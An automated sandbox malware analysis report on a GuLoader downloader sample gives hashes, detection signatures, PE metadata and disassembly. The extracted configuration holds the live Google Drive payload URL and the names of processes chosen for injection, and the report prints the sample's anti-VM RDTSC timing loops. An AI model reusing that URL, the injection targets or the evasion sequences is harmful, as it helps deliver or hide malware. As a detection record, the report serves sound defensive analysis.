Loading ...

Play interactive tourEdit tour

Analysis Report PP05492110.exe

Overview

General Information

Sample Name:PP05492110.exe
Analysis ID:385457
MD5:9cb24f7919feb0b91ff6071d6fddbaf6
SHA1:4910e701802ff270266954f34bd384fcf987d429
SHA256:e14114a3eabaaf81a42459e2dab69cf044fe90909d7bf7ccb9db62e4d12a51ce
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
PE file contains an invalid checksum
PE file contains strange resources
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • PP05492110.exe (PID: 2888 cmdline: 'C:\Users\user\Desktop\PP05492110.exe' MD5: 9CB24F7919FEB0B91FF6071D6FDDBAF6)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=15OztyABrKIbvulchlM9fuv9fi1p1lVIL", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.753553871.0000000000500000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.753553871.0000000000500000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=15OztyABrKIbvulchlM9fuv9fi1p1lVIL", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}
    Machine Learning detection for sampleShow sources
    Source: PP05492110.exeJoe Sandbox ML: detected
    Source: PP05492110.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0041A3EC __vbaChkstk,__vbaRecUniToAnsi,__vbaStrToAnsi,FindFirstFileA,__vbaSetSystemError,__vbaRecAnsiToUni,__vbaFreeStr,__vbaEnd,#593,__vbaFreeVar,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaFreeStr,#619,__vbaVarTstNe,__vbaFreeVar,__vbaFpI4,__vbaHresultCheckObj,#693,__vbaVarDup,#600,__vbaFreeVar,__vbaFreeStr,0_2_0041A3EC
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_004138E4 FindFirstFileA,0_2_004138E4

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=15OztyABrKIbvulchlM9fuv9fi1p1lVIL
    Source: PP05492110.exe, 00000000.00000002.753871961.000000000069A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: C:\Users\user\Desktop\PP05492110.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0040D6470_2_0040D647
    Source: PP05492110.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: PP05492110.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: PP05492110.exe, 00000000.00000000.229065756.000000000041F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLaboredly5.exe vs PP05492110.exe
    Source: PP05492110.exe, 00000000.00000002.754349737.0000000002130000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLaboredly5.exeFE2XPana-sonic vs PP05492110.exe
    Source: PP05492110.exe, 00000000.00000002.753767529.0000000000640000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PP05492110.exe
    Source: PP05492110.exeBinary or memory string: OriginalFilenameLaboredly5.exe vs PP05492110.exe
    Source: PP05492110.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/0@0/0
    Source: C:\Users\user\Desktop\PP05492110.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9B833C04D7FE5A04.TMPJump to behavior
    Source: PP05492110.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\PP05492110.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.753553871.0000000000500000.00000040.00000001.sdmp, type: MEMORY
    Source: PP05492110.exeStatic PE information: real checksum: 0x33b86 should be: 0x2f77b
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_00404C82 push E441211Ah; ret 0_2_00404C88
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_00406505 push ebx; retf 0_2_0040650F
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_00406510 push ebx; retf 0_2_0040650F
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0040D647 pushfd ; iretd 0_2_0040D877
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0040BA7D push 7600FFCEh; iretd 0_2_0040BA82
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_00401B43 push edi; ret 0_2_00401B53
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0040AF47 push ebp; ret 0_2_0040AF4B
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\PP05492110.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\PP05492110.exeRDTSC instruction interceptor: First address: 00000000004092A7 second address: 00000000004092A7 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, 000000C7h 0x00000007 fucom st(1), st(0) 0x00000009 fsincos 0x0000000b pxor mm2, mm4 0x0000000e fsubp st(2), st(0) 0x00000010 fdecstp 0x00000012 fldpi 0x00000014 jmp 00007FDE6CAD8ECAh 0x00000016 cmp ebx, 4Ah 0x00000019 cmp eax, 000000EAh 0x0000001e cmp eax, 000000B8h 0x00000023 cmp ebx, 000000A9h 0x00000029 cmp eax, 000000A3h 0x0000002e cmp edi, 02EAFF40h 0x00000034 movd mm1, ebx 0x00000037 movd mm1, ebx 0x0000003a psraw xmm3, xmm3 0x0000003e paddusw xmm6, xmm4 0x00000042 fcos 0x00000044 fyl2xp1 0x00000046 fldlg2 0x00000048 fabs 0x0000004a fcomp st(0), st(6) 0x0000004c jmp 00007FDE6CAD8EC7h 0x0000004e movd mm1, ebx 0x00000051 movd mm1, ebx 0x00000054 jne 00007FDE6CAD8CE6h 0x0000005a inc edi 0x0000005b fdecstp 0x0000005d fmul st(0), st(6) 0x0000005f pand xmm6, xmm3 0x00000063 fsubrp st(2), st(0) 0x00000065 psrlw xmm5, 32h 0x0000006a emms 0x0000006c wait 0x0000006d fnclex 0x0000006f fsubp st(7), st(0) 0x00000071 paddsw xmm3, xmm3 0x00000075 jmp 00007FDE6CAD8EC7h 0x00000077 cmp ebx, 05h 0x0000007a cmp ebx, 000000C1h 0x00000080 cmp eax, 000000A4h 0x00000085 cmp eax, 17h 0x00000088 cmp ebx, 3Eh 0x0000008b cmp eax, 1Dh 0x0000008e rdtsc
    Source: C:\Users\user\Desktop\PP05492110.exeRDTSC instruction interceptor: First address: 00000000005033F0 second address: 00000000005033F0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDE6CEFE954h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 jmp 00007FDE6CEFE94Ah 0x00000022 test al, cl 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007FDE6CEFE902h 0x0000002a clc 0x0000002b push ecx 0x0000002c cmp ax, 00008F45h 0x00000030 call 00007FDE6CEFE96Eh 0x00000035 call 00007FDE6CEFE964h 0x0000003a lfence 0x0000003d mov edx, dword ptr [7FFE0014h] 0x00000043 lfence 0x00000046 ret 0x00000047 mov esi, edx 0x00000049 pushad 0x0000004a rdtsc
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_0041A3EC __vbaChkstk,__vbaRecUniToAnsi,__vbaStrToAnsi,FindFirstFileA,__vbaSetSystemError,__vbaRecAnsiToUni,__vbaFreeStr,__vbaEnd,#593,__vbaFreeVar,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaFreeStr,#619,__vbaVarTstNe,__vbaFreeVar,__vbaFpI4,__vbaHresultCheckObj,#693,__vbaVarDup,#600,__vbaFreeVar,__vbaFreeStr,0_2_0041A3EC
    Source: C:\Users\user\Desktop\PP05492110.exeCode function: 0_2_004138E4 FindFirstFileA,0_2_004138E4

    Anti Debugging:

    barindex
    Found potential dummy code loops (likely to delay analysis)Show sources
    Source: C:\Users\user\Desktop\PP05492110.exeProcess Stats: CPU usage > 90% for more than 60s
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: PP05492110.exe, 00000000.00000002.754099835.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: PP05492110.exe, 00000000.00000002.754099835.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: PP05492110.exe, 00000000.00000002.754099835.0000000000D20000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
    Source: PP05492110.exe, 00000000.00000002.754099835.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
    Source: PP05492110.exe, 00000000.00000002.754099835.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Virtualization/Sandbox Evasion11Input Capture1Security Software Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PP05492110.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:31.0.0 Emerald
    Analysis ID:385457
    Start date:12.04.2021
    Start time:14:44:39
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 56s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:PP05492110.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal72.troj.evad.winEXE@1/0@0/0
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 89.1% (good quality ratio 34.9%)
    • Quality average: 22.9%
    • Quality standard deviation: 31.2%
    HCA Information:Failed
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385457/sample/PP05492110.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.733443572399981
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:PP05492110.exe
    File size:147456
    MD5:9cb24f7919feb0b91ff6071d6fddbaf6
    SHA1:4910e701802ff270266954f34bd384fcf987d429
    SHA256:e14114a3eabaaf81a42459e2dab69cf044fe90909d7bf7ccb9db62e4d12a51ce
    SHA512:51a86f12d4dba21d538d8ad2255b17fc3bdb86c9f7feac2adf4fb6f5ce19c61e2a9644171ea445103ff301d2f9ab7b1c711aac36cbe23c6ad96a6fd773a63374
    SSDEEP:3072:LHefjwxF+0v8Vm2XULJ0is0Y4W71TVmy:6wHxv8s2CjY4Wxsy
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....Q.V............................l.............@................

    File Icon

    Icon Hash:c0c6f2e0e4fefe3f

    Static PE Info

    General

    Entrypoint:0x40166c
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x56EA51D8 [Thu Mar 17 06:42:32 2016 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:879f5bbda1e2f48716a0325e5b7fa215

    Entrypoint Preview

    Instruction
    push 004110B0h
    call 00007FDE6C325363h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    inc eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add bl, bh
    out 99h, al
    xor edi, ebx
    std
    imul eax, dword ptr [esi-64h], 8Fh
    inc edx
    lahf
    jnc 00007FDE6C325392h
    retf
    bound eax, dword ptr [eax]
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [ecx], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [edx+45h], dl
    dec ebp
    push ebp
    inc ecx
    inc edx
    dec esp
    inc ebp
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    or al, 27h
    aaa
    dec edi
    mov eax, 44C3B89Fh
    sahf
    dec ebp
    push 00000014h
    jc 00007FDE6C3253BAh
    mov edi, AFA9FF41h
    add dword ptr [edi+75h], 84A0456Bh
    sbb al, C4h
    xor eax, 3AF35FC2h
    dec edi
    lodsd
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    wait
    stc
    add byte ptr [eax], al
    mov bh, dh
    add byte ptr [eax], al
    add byte ptr [edx], cl
    add byte ptr [ebx+41h], dl
    inc ecx
    dec ebx
    dec edi
    push edx
    dec esi
    inc ebp
    dec esi
    inc ebp
    add byte ptr [56000A01h], cl
    popad
    insb
    push 00000000h

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x1be440x28.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000x5c42.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1c0.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x1b4e00x1c000False0.400408063616data6.02633035795IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data0x1d0000x12f00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x1f0000x5c420x6000False0.359944661458data5.27700643593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_ICON0x23d9a0xea8data
    RT_ICON0x234f20x8a8data
    RT_ICON0x22f8a0x568GLS_BINARY_LSB_FIRST
    RT_ICON0x209e20x25a8dBase III DBT, version number 0, next free block index 40
    RT_ICON0x1f93a0x10a8data
    RT_ICON0x1f4d20x468GLS_BINARY_LSB_FIRST
    RT_GROUP_ICON0x1f4780x5adata
    RT_VERSION0x1f1e00x298dataGuaraniParaguay

    Imports

    DLLImport
    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    DescriptionData
    Translation0x0474 0x04b0
    InternalNameLaboredly5
    FileVersion1.00
    CompanyNamePana-sonic
    CommentsPana-sonic
    ProductNamePana-sonic
    ProductVersion1.00
    FileDescriptionPana-sonic
    OriginalFilenameLaboredly5.exe

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    GuaraniParaguay

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Start time:14:45:29
    Start date:12/04/2021
    Path:C:\Users\user\Desktop\PP05492110.exe
    Wow64 process (32bit):true
    Commandline:'C:\Users\user\Desktop\PP05492110.exe'
    Imagebase:0x400000
    File size:147456 bytes
    MD5 hash:9CB24F7919FEB0B91FF6071D6FDDBAF6
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000000.00000002.753553871.0000000000500000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Disassembly

    Code Analysis

    Reset < >

      Execution Graph

      Execution Coverage:8.1%
      Dynamic/Decrypted Code Coverage:0.7%
      Signature Coverage:3.1%
      Total number of Nodes:450
      Total number of Limit Nodes:29

      Graph

      execution_graph 1718 4013d2 __vbaFPException 1565 41af55 __vbaChkstk 1566 41afa9 __vbaAryConstruct2 1565->1566 1567 41afd0 __vbaNew2 1566->1567 1568 41afeb 1566->1568 1567->1568 1569 41b049 1568->1569 1570 41b029 __vbaHresultCheckObj 1568->1570 1571 41b085 __vbaHresultCheckObj 1569->1571 1572 41b0a8 1569->1572 1570->1569 1573 41b0af __vbaFreeObj 1571->1573 1572->1573 1574 41b0d0 1573->1574 1575 41b101 1574->1575 1576 41b0e1 __vbaHresultCheckObj 1574->1576 1577 41b108 __vbaStrCmp __vbaFreeStr 1575->1577 1576->1577 1578 41b133 __vbaEnd 1577->1578 1579 41b13f 1577->1579 1578->1579 1580 41b14b __vbaSetSystemError 1579->1580 1581 41b203 10 API calls 1580->1581 1582 41b166 __vbaChkstk __vbaChkstk 1580->1582 1583 41b2d3 __vbaFpI4 1581->1583 1584 41b34f 1581->1584 1585 41b1cb 1582->1585 1590 41b31e 1583->1590 1586 41b376 __vbaGenerateBoundsError 1584->1586 1587 41b36d 1584->1587 1588 41b1fc 1585->1588 1589 41b1dc __vbaHresultCheckObj 1585->1589 1586->1587 1591 41b3b2 __vbaGenerateBoundsError 1587->1591 1592 41b3a9 1587->1592 1588->1581 1589->1581 1590->1584 1593 41b32f __vbaHresultCheckObj 1590->1593 1594 41b3bd #684 __vbaFpR8 1591->1594 1592->1594 1593->1584 1595 41b406 #685 __vbaObjSet 1594->1595 1596 41b50a #592 __vbaFreeVar 1594->1596 1599 41b4a4 1595->1599 1597 41b557 __vbaVarDup #667 __vbaStrMove __vbaFreeVar 1596->1597 1598 41b5ab #670 __vbaVarTstEq __vbaFreeVar 1596->1598 1597->1598 1600 41b606 1598->1600 1601 41b71d 1598->1601 1602 41b4d5 1599->1602 1603 41b4b5 __vbaHresultCheckObj 1599->1603 1606 41b631 1600->1606 1607 41b616 __vbaNew2 1600->1607 1604 41b748 1601->1604 1605 41b72d __vbaNew2 1601->1605 1608 41b4dc __vbaFreeObj __vbaFreeVarList 1602->1608 1603->1608 1609 41b7a6 1604->1609 1610 41b786 __vbaHresultCheckObj 1604->1610 1605->1604 1611 41b68f 1606->1611 1612 41b66f __vbaHresultCheckObj 1606->1612 1607->1606 1608->1596 1615 41b7e2 __vbaHresultCheckObj 1609->1615 1616 41b805 1609->1616 1610->1609 1613 41b696 __vbaChkstk 1611->1613 1612->1613 1614 41b6dd 1613->1614 1617 41b70e 1614->1617 1618 41b6ee __vbaHresultCheckObj 1614->1618 1619 41b80c __vbaFreeObj _CIcos __vbaFpR8 1615->1619 1616->1619 1620 41b715 __vbaFreeObj 1617->1620 1618->1620 1621 41b841 1619->1621 1622 41b8f5 __vbaStrCopy __vbaStrCopy 1619->1622 1620->1601 1623 41b873 1621->1623 1624 41b858 __vbaNew2 1621->1624 1625 41b989 1622->1625 1629 41b8d3 1623->1629 1630 41b8b3 __vbaHresultCheckObj 1623->1630 1624->1623 1626 41b9b8 1625->1626 1627 41b998 __vbaHresultCheckObj 1625->1627 1628 41b9bf __vbaFreeStrList 1626->1628 1627->1628 1658 4134fc 1628->1658 1631 41b8da __vbaStrMove 1629->1631 1630->1631 1631->1622 1632 41ba5b __vbaStrCopy 1633 41ba90 1632->1633 1634 41babf 1633->1634 1635 41ba9f __vbaHresultCheckObj 1633->1635 1636 41bac6 __vbaFreeStr 1634->1636 1635->1636 1656 41a3ec 24 API calls 1636->1656 1637 41bb1f 1638 41bb4e 1637->1638 1639 41bb2e __vbaHresultCheckObj 1637->1639 1640 41bb55 __vbaStrCopy __vbaStrCopy 1638->1640 1639->1640 1641 41bbbe 1640->1641 1642 41bbed 1641->1642 1643 41bbcd __vbaHresultCheckObj 1641->1643 1644 41bbf4 __vbaFreeStrList __vbaOnError 1642->1644 1643->1644 1645 41bc39 1644->1645 1646 41bc6a 1645->1646 1647 41bc4a __vbaHresultCheckObj 1645->1647 1648 41bcbd 1646->1648 1649 41bc9d __vbaHresultCheckObj 1646->1649 1647->1646 1650 41bcc4 __vbaVarMove 1648->1650 1649->1650 1651 41bcf1 __vbaVarAdd __vbaVarMove __vbaVarTstLt 1650->1651 1652 41bd61 __vbaVarMove 1651->1652 1653 41bd5f 1651->1653 1655 41bdda __vbaFreeStr __vbaFreeVar __vbaFreeVar __vbaAryDestruct __vbaFreeStr 1652->1655 1653->1651 1656->1637 1659 413505 1658->1659 1660 40b835 1663 41b84d 1660->1663 1662 40b852 1664 41b873 1663->1664 1665 41b858 __vbaNew2 1663->1665 1666 41b8d3 1664->1666 1667 41b8b3 __vbaHresultCheckObj 1664->1667 1665->1664 1668 41b8da __vbaStrMove 1666->1668 1667->1668 1669 41b8f5 __vbaStrCopy __vbaStrCopy 1668->1669 1670 41b989 1669->1670 1671 41b9b8 1670->1671 1672 41b998 __vbaHresultCheckObj 1670->1672 1673 41b9bf __vbaFreeStrList 1671->1673 1672->1673 1698 4134fc 1673->1698 1674 41ba5b 